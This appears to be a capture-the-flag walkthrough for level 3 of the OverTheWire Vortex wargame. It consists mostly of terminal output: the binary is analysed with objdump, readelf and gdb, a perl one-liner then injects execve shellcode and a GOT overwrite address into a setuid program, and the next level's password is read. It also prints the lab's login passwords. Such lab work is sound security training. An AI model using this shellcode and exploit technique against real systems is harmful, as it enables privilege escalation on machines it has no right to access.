# Vortex wargame: Level 3


# ssh vortex3@vortex.labs.overthewire.org
vortex3@vortex.labs.overthewire.org's password:36346e635854767823

$ file /vortex/vortex3
/vortex/vortex3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xfa95ff349b30e694b0106281d5c79e2b1ab997c2, not stripped
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
08048320 <exit@plt>:
 8048320:       ff 25 38 97 04 08       jmp    *0x8049738
 8048326:       68 10 00 00 00          push   $0x10
 804832b:       e9 c0 ff ff ff          jmp    80482f0 <_init+0x3c>
$ readelf --sections /vortex/vortex3 | grep "\["
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000051 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804825e 00025e 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048340 000340 0001ec 00  AX  0   0 16
  [14] .fini             PROGBITS        0804852c 00052c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048548 000548 000008 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048550 000550 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048584 000584 0000c0 00   A  0   0  4
  [18] .ctors            PROGBITS        08049644 000644 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804964c 00064c 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049654 000654 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049658 000658 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        08049720 000720 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049724 000724 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        08049740 000740 000010 00  WA  0   0  4
  [25] .bss              NOBITS          08049750 000750 000008 00  WA  0   0  4
  [26] .comment          PROGBITS        00000000 000750 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 00077a 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000d28 000440 10     29  45  4
  [29] .strtab           STRTAB          00000000 001168 000216 00      0   0  1
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
0x80482a4
0x8048322 
0x80492a4
0x8049322
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
vortex4
$ /bin/cat /etc/vortex_pass/vortex4
32596d674b313d6a77

No comments: